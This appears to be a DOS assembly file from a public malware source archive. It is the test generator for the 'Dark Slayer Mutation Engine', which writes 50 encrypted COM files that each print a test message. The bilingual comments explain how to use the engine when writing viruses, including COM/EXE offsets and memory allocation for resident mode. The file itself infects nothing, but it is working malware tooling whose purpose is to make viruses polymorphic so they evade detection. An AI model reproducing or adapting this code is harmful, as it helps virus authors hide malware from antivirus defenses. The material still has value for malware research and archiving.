MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.dsme-gen.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

119 lines
4.1 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; Dark Slayer Mutation Engine v1.0
; Written by Dark Slayer in Taiwan
DSME_GEN SEGMENT
ASSUME CS:DSME_GEN,DS:DSME_GEN
ORG 0100h
MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0005h
EXTRN DSME:NEAR,DSME_END:NEAR
; 以下程式,除了要注意的地方有注解,其它部份自己研究
; you may get some information as following remarks
;
START:
MOV AH,09h
MOV DX,OFFSET DG_MSG
INT 21h
MOV AX,OFFSET DSME_END+000Fh ; 本程式 + DSME+000Fh 之後的位址
; 若減 0100h 則成為本程式 + DSME 的長度
; This program + DSME+000Fh address
; Minus 0100h = this program + DSME
; lengh
MOV CL,04h
SHR AX,CL
MOV BX,CS
ADD BX,AX
MOV ES,BX ; 設 ES 用來放解碼程式和被編碼資料
; 解碼程式最大為 1024 Bytes
; 若用在常駐程式時,則須注意分配的記憶體大小
; Setting ES to put decryptor and encrypted
; code.
; Decryptor maxium is 1024 bytes
; You should notice the allocation of memory
; size when you use DSME in resident mode.
MOV CX,50
DG_L0:
PUSH CX
MOV AH,3Ch
XOR CX,CX
MOV DX,OFFSET FILE_NAME
INT 21h
XCHG BX,AX
MOV BP,0100h ; 解碼程式偏移位址
; 用來寫毒時則依欲感染檔案之大小而設
; Offset where the decryption routine
; will be executed
; It depends on which kinds of files
; COM or EXE?
MOV CX,OFFSET PROC_END-OFFSET PROC_START ; 被編碼程式的長度
; encrypted code
; lengh
MOV DX,OFFSET PROC_START ; DS:DX -> 要被編碼的程式位址
; DS:DX -> Encrypted code's
; address
PUSH BX ; 保存 File handle
; keep File handle
MOV BL,00h ; COM 模式
; COM mode
CALL DSME
POP BX
MOV AH,40h ; 返回時 DS:DX = 解碼程式 + 被編碼程式的位址
INT 21h ; CX = 解碼程式 + 被編碼程式的長度,其它暫存器不變
; When returning from DSME,
; DS:DX = decryptor + encrypted code's address
; CX = lengh of decryptor + encrypted code
; Other registers won't be changed.
MOV AH,3Eh
INT 21h
PUSH CS
POP DS ; 將 DS 設回來
; restore DS
MOV BX,OFFSET FILE_NUM
INC BYTE PTR DS:[BX+0001h]
CMP BYTE PTR DS:[BX+0001h],'9'
JBE DG_L1
INC BYTE PTR DS:[BX]
MOV BYTE PTR DS:[BX+0001h],'0'
DG_L1:
POP CX
LOOP DG_L0
MOV AH,4Ch
INT 21h
FILE_NAME DB '000000'
FILE_NUM DB '00.COM',00h
DG_MSG DB 'Generates 50 DSME encrypted test files.',0Dh,0Ah,'$'
PROC_START:
MOV AH,09h
CALL $+0003h
POP DX
ADD DX,MSG_ADDR
INT 21h
INT 20h
MSG DB 'this is <DSME> test file.$'
PROC_END:
DSME_GEN ENDS
END START